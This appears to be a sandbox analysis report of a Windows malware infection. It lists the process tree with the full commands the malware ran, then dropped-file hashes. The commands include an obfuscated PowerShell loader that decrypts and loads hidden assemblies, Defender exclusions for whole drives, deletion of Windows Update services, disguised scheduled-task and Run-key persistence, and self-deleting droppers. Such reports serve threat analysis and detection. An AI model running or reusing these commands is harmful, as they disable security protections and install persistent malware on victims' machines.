C:\Users\Admin\AppData\Roaming\JGAbA.bat.exe"C:\Users\Admin\AppData\Roaming\JGAbA.bat.exe" function PX($c){$c.Replace('EOIUi', '')}$UcNH=PX 'GeEOIUitCurEOIUirenEOIUitPrEOIUioceEOIUissEOIUi';$LMam=PX 'REOIUieaEOIUidLEOIUiinEOIUieEOIUisEOIUi';$nIei=PX 'CEOIUihEOIUiangEOIUieEOIUiExteEOIUinEOIUisiEOIUionEOIUi';$GDjp=PX 'InEOIUivokEOIUieEOIUi';$cJOL=PX 'FEOIUiirsEOIUitEOIUi';$bNvC=PX 'EntrEOIUiyPoEOIUiiEOIUintEOIUi';$ZDDe=PX 'FroEOIUimBEOIUiaseEOIUi64SEOIUitrEOIUiingEOIUi';$wEka=PX 'LoaEOIUidEOIUi';$xsru=PX 'CreEOIUiatEOIUieDEOIUiecrEOIUiyEOIUipEOIUitoEOIUirEOIUi';$JaHM=PX 'TrEOIUianEOIUisforEOIUimFEOIUiinEOIUialEOIUiBlEOIUiockEOIUi';function AyMSx($aADFu){$mkeZq=[System.Security.Cryptography.Aes]::Create();$mkeZq.Mode=[System.Security.Cryptography.CipherMode]::CBC;$mkeZq.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$mkeZq.Key=[System.Convert]::$ZDDe('33o4mPrkfBEGS8RPjJSCxTGdyodbZrRhtRuNUH5rzRk=');$mkeZq.IV=[System.Convert]::$ZDDe('Pw0jyFBtnQYUrNsqUX5AOg==');$kgbNu=$mkeZq.$xsru();$gGieg=$kgbNu.$JaHM($aADFu,0,$aADFu.Length);$kgbNu.Dispose();$mkeZq.Dispose();$gGieg;}function QpgTW($aADFu){$lUmJr=New-Object System.IO.MemoryStream(,$aADFu);$vxHfp=New-Object System.IO.MemoryStream;$CEpcv=New-Object System.IO.Compression.GZipStream($lUmJr,[IO.Compression.CompressionMode]::Decompress);$CEpcv.CopyTo($vxHfp);$CEpcv.Dispose();$lUmJr.Dispose();$vxHfp.Dispose();$vxHfp.ToArray();}function jfGQF($aADFu,$OnnHT){[System.Reflection.Assembly]::$wEka([byte[]]$aADFu).$bNvC.$GDjp($null,$OnnHT);}$oEcWz=[System.Linq.Enumerable]::$cJOL([System.IO.File]::$LMam([System.IO.Path]::$nIei([System.Diagnostics.Process]::$UcNH().MainModule.FileName, $null)));$fmJXF = $oEcWz.Substring(3).Split('\');$xAiAZ=QpgTW (AyMSx ([Convert]::$ZDDe($fmJXF[0])));$AjQdR=QpgTW (AyMSx ([Convert]::$ZDDe($fmJXF[1])));jfGQF $AjQdR $null;jfGQF $xAiAZ $null;6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(1968);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;7⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\')7⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\JGAbA')7⤵
-
C:\Users\Admin\AppData\Local\Temp\394108.exe"C:\Users\Admin\AppData\Local\Temp\394108.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(1312);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;7⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
- Modifies security service
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' }2⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#iqegjinl#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "NoteUpdateTaskMachineQC" } Else { "C:\Program Files\Notepad\Chrome\updater.exe" }2⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn NoteUpdateTaskMachineQC3⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe2⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe2⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\E048.exeC:\Users\Admin\AppData\Local\Temp\E048.exe2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\system32\dllhost.exe"C:\Windows\system32\dllhost.exe"3⤵
- Accesses Microsoft Outlook profiles
- Checks processor information in registry
- outlook_office_path
- outlook_win_path
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5064 -s 7123⤵
- Program crash
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe2⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe2⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe2⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\F2E7.exeC:\Users\Admin\AppData\Local\Temp\F2E7.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"3⤵
- Loads dropped DLL
- Checks processor information in registry
-
C:\ProgramData\72993574041601362566.exe"C:\ProgramData\72993574041601362566.exe"4⤵
- Executes dropped EXE
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /C choice /C Y /N /D Y /T 0 &Del C:\ProgramData\72993574041601362566.exe5⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 06⤵
-
C:\ProgramData\60711744363166210615.exe"C:\ProgramData\60711744363166210615.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exeC:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" & exit4⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 65⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' }2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe zuhwtyqtfkk2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
- Drops file in Program Files directory
-
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController GET Name, VideoProcessor3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
- Drops file in Program Files directory
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe ozascextlcafxrlv 6E3sjfZq2rJQaxvLPmXgsH8HqLgRgcx0/LVDxBdghhCp2+hEkY7tykSHwITYgOlci3ytMC8bvXFdgLfubt31d00EGUNZvUBUebLdyQcn06lc9XyK+SQQg4bEvwPCdT2KYoSnyaznjkuq+t/WEmnCxetIZsxpO3p/zzwJI2q0v1rwbWjqgzbDndc3ETa3aKYf8EOpU9uqIUcKKIP5glSGIF5NNBIQIOxiwAszeRmTD+ssM2JwNB+ZJXRJvy123U7UEXSTx71FLoxpDYVaIMhOE++Mr3hazCz1q4t4s5o8+wL0kdpUV5VnrG7JmlnWotU5n89qBghGm+y6SMYnw4GovlYYIKPio/EJCBO4ISkMSM9oXvdK2xwDd7nOPHNI0ub2+9+yDpmbkJhXPRjLmh8EzH9no+cA8XXsDqc7l4Il6Q8HZCkxxQKp3X7QrvGtORgpsiUFRUsjuuqKF8OZDBQ643uz5XTg02QKOJfFPdU0JLRX+q6NZJdak+3EYZdI36Zgtv5L8IJAttmNYCJqIJTseVMH04bRJ5WBnXqRYehi2MM0O1YRQDI8kKVhBta2xSurnVpcEWelFYwmZuF8Vd3YhHb8yAOoY//KgjosTtbU5Co=2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 4520 -ip 45201⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 3676 -ip 36761⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 3796 -ip 37961⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"2⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exeC:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe1⤵
- Executes dropped EXE
-
C:\Program Files\Notepad\Chrome\updater.exe"C:\Program Files\Notepad\Chrome\updater.exe"1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 532 -p 1460 -ip 14601⤵
-
C:\Windows\sysWOW64\wbem\wmiprvse.exeC:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding1⤵
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 5064 -ip 50641⤵
-
C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exeC:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe1⤵
- Executes dropped EXE
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SDRSVC1⤵
-
C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exeC:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exeC:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exeC:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exeC:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exeC:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exeC:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\wjtaraiC:\Users\Admin\AppData\Roaming\wjtarai1⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\ibtaraiC:\Users\Admin\AppData\Roaming\ibtarai1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3844 -s 3402⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 3844 -ip 38441⤵
-
C:\Users\Admin\AppData\Roaming\rgtaraiC:\Users\Admin\AppData\Roaming\rgtarai1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5080 -s 3402⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 5080 -ip 50801⤵
-
C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exeC:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exeC:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exeC:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe1⤵
- Executes dropped EXE
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files\Notepad\Chrome\updater.exeFilesize
3.7MB
MD53006b49f3a30a80bb85074c279acc7df
SHA1728a7a867d13ad0034c29283939d94f0df6c19df
SHA256f283b4c0ad4a902e1cb64201742ca4c5118f275e7b911a7dafda1ef01b825280
SHA512e8fc5791892d7f08af5a33462a11d39d29b5e86a62cbf135b12e71f2fcaaa48d40d5e3238f64e17a2f126bcfb9d70553a02d30dc60a89f1089b2c1e7465105dd
-
C:\ProgramData\60711744363166210615.exeFilesize
1.5MB
MD588409b138f8c502999e09f58122f03a2
SHA1a3eded4116a778e5167d0d57a5c0d2227965bece
SHA256eb301d7c17cd40cbc0178d046332d8aeb02c93b3dfd34bae4b97d585b894bea5
SHA51222b0b9fc76502a11f364ed3a4604dcea72f31d22ea8b27cafe62404bac47eb6b5fa4456f36bcae45d912407933f785fa94699342eebdb7f36e13932b25f2a4df
-
C:\ProgramData\72993574041601362566.exeFilesize
13.9MB
MD52a6011b7ced1dfd2acba59b307e4f77e
SHA17f2d0a0e60b2e2f7e8afd34314066a4560cc8c7b
SHA25607112a4ab098c8bbddc80cf2f2bfabf3d1f8234df6af6be984d00ee021dc6fbf
SHA512333ef30d44db6c1088dbec71fd0ad229d586725f10154d6d88380246816bed5fbec542b9e0f3f1f8e782f4c90e85832965d84efdc5cc14ab093bf96c2ee2feb8
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850DFilesize
2KB
MD5e5b1cc0ae5af6a8277d75cff4af2c5e8
SHA14768fff3d4bbe02f89683b4a0e7b15b24b54eb9f
SHA256d950c0d748aae641d71b11cd1c519b289917c23bee1a2b6bc5c496fd8e5d4655
SHA51257a4737deeefac0124d73b52525993fecbbebd21a556ece87f8e79e845e07f037abb5e49f7458e8a010935c6691f18fbb913d77ecfb2ba902067788c483ec3d7
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711EFilesize
1KB
MD53adac03b181d7980568dda0da0efc9de
SHA1a283c4c9bd26a65b8240d21708e57f5946778341
SHA25624c4973ced938b77d9670ac79eb76cd52411b17ab59ec78ba14c1b433f342933
SHA5126fbd2a32fc18606628ea56311764cd879a1196405dddd4d269ad6163b2ffdcf916786f1c0328f27ec089be5cb9b4ecb3542363f4dfb3df1c1b91a0e038b67241
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850DFilesize
488B
MD5fa1a529ab057cc1a2e086b13b9433574
SHA12369abb56ee5f669031dad430be688448937d6e4
SHA256cc03152e4ab0d12fa903b0967073d94137ef926d3d5ff9be4c48258c22057871
SHA512455d5a9bdba89caae865d16624bf7275cb1493575c7863c530bf405719d577a5480008232c6770a4994b65c3db4ffab27426540d7ca378d8f63496b5acc66faf
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711EFilesize
482B
MD547c81dc3177a115246bdf2171937272f
SHA151620a9b8721ee553112446d070768979b1163fb
SHA25667244d41ad2bb641e1da208807e6841368a33810017b575a0ec2161f9409ca41
SHA5129f1c54e3e68b5688d634a833ecdc1bfbc399f82c06fbbb74bdaa1024771d2b1105fb2dd5e0d9ad3b9be42d28c8719af0f14cb5463ae94a2230564c71d1e82c9f
-
C:\Users\Admin\AppData\Local\4dbd1898-d200-4d2a-b39c-a640ea533983\E3BD.exeFilesize
782KB
MD55a31b39bc1aeb9e9cf101369c6443246
SHA189d1c38255c07a276620d57a674d81ac052e27e1
SHA25695a3871c134ffd2b87034387d61485ec6e292de119cdfa162f88c41d763d0407
SHA5126db4157cd7eb0002ce072f93615cb115e75ce284c8caa84a5fcf45832ede91f205cbdd8cf690f0c6e84da3458b476c20f878d5f6fdba18282b32b0d571286222
-
C:\Users\Admin\AppData\Local\7e557038-2294-4470-b05e-035177f746a6\build3.exeFilesize
9KB
MD59ead10c08e72ae41921191f8db39bc16
SHA1abe3bce01cd34afc88e2c838173f8c2bd0090ae1
SHA2568d7f0e6b6877bdfb9f4531afafd0451f7d17f0ac24e2f2427e9b4ecc5452b9f0
SHA512aa35dbc59a3589df2763e76a495ce5a9e62196628b4c1d098add38bd7f27c49edf93a66fb8507fb746e37ee32932da2460e440f241abe1a5a279abcc1e5ffe4a
-
C:\Users\Admin\AppData\Local\7e557038-2294-4470-b05e-035177f746a6\build3.exeFilesize
9KB
MD59ead10c08e72ae41921191f8db39bc16
SHA1abe3bce01cd34afc88e2c838173f8c2bd0090ae1
SHA2568d7f0e6b6877bdfb9f4531afafd0451f7d17f0ac24e2f2427e9b4ecc5452b9f0
SHA512aa35dbc59a3589df2763e76a495ce5a9e62196628b4c1d098add38bd7f27c49edf93a66fb8507fb746e37ee32932da2460e440f241abe1a5a279abcc1e5ffe4a
-
C:\Users\Admin\AppData\Local\7e557038-2294-4470-b05e-035177f746a6\build3.exeFilesize
9KB
MD59ead10c08e72ae41921191f8db39bc16
SHA1abe3bce01cd34afc88e2c838173f8c2bd0090ae1
SHA2568d7f0e6b6877bdfb9f4531afafd0451f7d17f0ac24e2f2427e9b4ecc5452b9f0
SHA512aa35dbc59a3589df2763e76a495ce5a9e62196628b4c1d098add38bd7f27c49edf93a66fb8507fb746e37ee32932da2460e440f241abe1a5a279abcc1e5ffe4a
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.logFilesize
2KB
MD5968cb9309758126772781b83adb8a28f
SHA18da30e71accf186b2ba11da1797cf67f8f78b47c
SHA25692099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA5124bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD5cadef9abd087803c630df65264a6c81c
SHA1babbf3636c347c8727c35f3eef2ee643dbcc4bd2
SHA256cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438
SHA5127278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD5cadef9abd087803c630df65264a6c81c
SHA1babbf3636c347c8727c35f3eef2ee643dbcc4bd2
SHA256cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438
SHA5127278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5c2411387dd5f68d6efbc1f2c923656e3
SHA11e530ecb70ce18b498ae5d91f43a49d27da8d235
SHA256c9336bce63e3a0f9e358ef72b6745b57c3cc4453f5fcb91b7a269d7a002d0f14
SHA512733eb99761f309c9bbdcf466001b2af33c5eb8333a0df0a44acfb6a85b66acf06e18df8f95944c1799dea0657552a103a57b13c9150d160b41a19d6594f9a1a5
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD50f6a3762a04bbb03336fb66a040afb97
SHA10a0495c79f3c8f4cb349d82870ad9f98fbbaac74
SHA25636e2fac0ab8aee32e193491c5d3df9374205e328a74de5648e7677eae7e1b383
SHA512cc9ebc020ec18013f8ab4d6ca5a626d54db84f8dc2d97e538e33bb9a673344a670a2580346775012c85f204472f7f4dd25a34e59f1b827642a21db3325424b69
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
18KB
MD553641ef37dbe451db4fc64f6e191dfcd
SHA13ae2e7c476ac7a84c08938cb638e6440bbf24274
SHA256e559b09053fd49a67360002d90182e0182d979b188920ba7e3a14e9739da5aa5
SHA5121404ab4c431449a3a02ff7e0367854e5ff10d29911b2ca52234bd852743f5e00cb560fa9dd27eaebf2d3c2b49f11f95961d5ccd51eed493beb8dcc7479109b5f
-
